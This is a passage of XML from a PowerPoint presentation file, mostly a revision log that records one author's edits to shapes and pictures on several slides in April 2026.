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9" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="268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A3011C-BA59-4B75-BA88-1F2A94165B23}" v="71" dt="2026-04-23T12:06:45.5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196" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="80" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="782" y="-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ian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld">
      <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T12:07:35.124" v="839" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:50:38.045" v="673" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="996238604" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:50:38.045" v="673" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="996238604" sldId="256"/>
            <ac:spMk id="2" creationId="{4D6F5412-FB26-DA02-B416-303D1E4F8ADC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:43:41.398" v="37" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1129953562" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:43:20.305" v="34" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129953562" sldId="258"/>
            <ac:spMk id="3" creationId="{D6891624-3655-DB9D-8935-C3F33E3B0770}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:43:09.817" v="32" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129953562" sldId="258"/>
            <ac:spMk id="9" creationId="{4C86128C-F722-2D6F-A91B-3E190BC07317}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:41:11.285" v="24" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129953562" sldId="258"/>
            <ac:spMk id="12" creationId="{B45A8DE1-4EDD-201E-07F1-B39951C485F0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:43:07.247" v="31" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129953562" sldId="258"/>
            <ac:spMk id="16" creationId="{A13617FE-CD33-D6C9-CA2E-9D2F8A29384A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:41:15.816" v="26" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129953562" sldId="258"/>
            <ac:spMk id="18" creationId="{FFCDF5BF-5A4B-A29D-EC65-E84977D948AC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:43:41.398" v="37" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129953562" sldId="258"/>
            <ac:picMk id="4" creationId="{85220472-4B46-E5F0-1469-AE41BB223C83}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:41:13.441" v="25" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129953562" sldId="258"/>
            <ac:picMk id="5" creationId="{91540D0F-5844-F9C9-5F5D-9389E2FE25AA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:41:17.641" v="27" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1129953562" sldId="258"/>
            <ac:picMk id="14" creationId="{00111B2C-598D-3785-22BC-38121CE8BFB7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T05:58:59.074" v="723" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3071582233" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T05:57:32.681" v="711" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:spMk id="4" creationId="{AC42AFE1-F3D0-D6C2-3E6B-693306DF2506}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:48:12.222" v="76" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:spMk id="5" creationId="{7F3F0990-75EE-C527-C299-B39803C26087}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T05:58:59.074" v="723" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:spMk id="6" creationId="{5A30F8AA-2646-6608-035B-B9B42D6036AA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T05:57:27.972" v="709" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:spMk id="9" creationId="{F49132F3-04F3-1664-D0B1-F573A54211F0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T05:57:25.391" v="708" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:spMk id="10" creationId="{43B70150-CC2D-CAF3-BF89-92597FDEEDF0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:46:31.408" v="54" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:spMk id="13" creationId="{F8DC4556-8994-7B27-667D-AEEDD9728881}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:46:28.865" v="53" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:spMk id="15" creationId="{A62F81C2-036D-554A-794F-AB9B2588D9F2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:48:01.549" v="74" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:spMk id="19" creationId="{3DBCBF35-0F3D-ACF4-4EFC-C6476AFFBBB8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:46:33.820" v="55" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:spMk id="21" creationId="{089D4553-03D2-3A11-9BA5-84305F419A97}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T05:56:31.931" v="701" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:picMk id="2" creationId="{0A0BDE12-0EDC-E95C-A2A9-874DB17154A3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T05:57:30.069" v="710" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:picMk id="7" creationId="{C8EFE027-453F-10C3-4592-60104DADC5B4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:46:24.179" v="51" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:picMk id="11" creationId="{6B3E9200-B39B-0378-5134-1EE787CD444E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T05:57:35.581" v="712" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:picMk id="12" creationId="{E06C202E-2C3C-7371-1506-8297ECA70DDA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:46:37.626" v="57" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071582233" sldId="259"/>
            <ac:picMk id="17" creationId="{E5943C7A-57E6-61E4-FE7C-C6A58683366B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:46:20.450" v="653" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2861020175" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:29:09.897" v="315" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:spMk id="2" creationId="{95766359-41E4-4D1E-7FBD-5C2E033C7D4E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:28:28.872" v="310"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:spMk id="4" creationId="{CB8DBD0D-3312-9066-3B2D-668A35B17D38}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:32:06.429" v="350" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:spMk id="5" creationId="{80A78673-2649-3D0D-E8F3-F0617447A182}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:29:02.581" v="314"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:spMk id="6" creationId="{7C450780-CEA3-6BF6-55CE-3A96BCAC748C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:29:01.844" v="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:spMk id="8" creationId="{DE59470E-DA39-EA7C-1A13-C616D43F3E0F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:31:57.302" v="348" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:spMk id="9" creationId="{B21DD595-FAA1-3B99-A404-59FF35ED9CFD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:32:09.379" v="351" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:spMk id="10" creationId="{1562EAF0-E57F-77B8-C3EB-2759E547541F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:32:00.311" v="349" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:spMk id="12" creationId="{5DA6DB04-AE50-61AD-756D-4C47DF788DD6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:51:14.600" v="94" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:spMk id="20" creationId="{B027BA55-C526-EAB1-AA14-CA8CBA172B24}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:51:08.844" v="92" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:spMk id="22" creationId="{9FF50EA1-9AE8-FF69-066B-C46C2C345A5A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:46:20.450" v="653" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:spMk id="24" creationId="{CE219D28-F5FA-1CF5-4A6B-668E490710DF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:26:33.159" v="295" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:picMk id="3" creationId="{77F4A985-1080-92A3-3F5B-A100B49AA008}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:27:35.904" v="308" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:picMk id="7" creationId="{411E2938-EE0F-A5FB-D8B7-82FAAB01F1FE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:51:11.401" v="93" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2861020175" sldId="260"/>
            <ac:picMk id="18" creationId="{A538E71E-E220-B16C-C7B7-E3D190B7DD1B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:34:24.600" v="766" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="689042798" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:34:24.600" v="766" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="689042798" sldId="261"/>
            <ac:spMk id="3" creationId="{06D75CBD-9804-A864-3A9A-748A912BD67D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:36:13.328" v="365" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="689042798" sldId="261"/>
            <ac:spMk id="5" creationId="{27CBC806-7B1A-68E7-F106-D98738F04CF6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:39:23.384" v="380" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="689042798" sldId="261"/>
            <ac:spMk id="8" creationId="{D5FC03C3-D65F-B577-A44E-34307AD5CA2C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:36:10.013" v="364" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="689042798" sldId="261"/>
            <ac:spMk id="9" creationId="{13F0CA7D-B5AA-04FD-34B7-6100D5A46602}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:39:29.881" v="381" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="689042798" sldId="261"/>
            <ac:spMk id="10" creationId="{2DFEFCBA-BBFD-2247-563B-3E374DD08A6C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:55:37.209" v="122" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="689042798" sldId="261"/>
            <ac:spMk id="12" creationId="{BCADB04C-7671-C597-5DF3-4E20CA6C2BCF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:35:07.408" v="353" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="689042798" sldId="261"/>
            <ac:picMk id="4" creationId="{656A96DE-8D25-10A6-E331-723AE1A49066}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:35:04.747" v="352" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="689042798" sldId="261"/>
            <ac:picMk id="6" creationId="{12A5B9BC-CB67-F2FB-5F0C-BE12634DB82B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:55:41.807" v="123" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="689042798" sldId="261"/>
            <ac:picMk id="8" creationId="{BED387C9-DEFE-A08B-9068-C32FAF5D74E8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:53:11.024" v="468" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="66459088" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:52:03.346" v="459" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:spMk id="3" creationId="{A823238A-5F40-CCAC-A1C9-6B130037B41D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:52:48.515" v="464" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:spMk id="5" creationId="{A9BCA756-8674-E36E-C886-397C532DAA6F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:53:11.024" v="468" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:spMk id="6" creationId="{415D778C-C0AE-D7C8-749E-36B0E3192853}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:52:41.114" v="463" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:spMk id="7" creationId="{16B187FF-B6F0-4F06-69A1-ACEA095AEEBE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
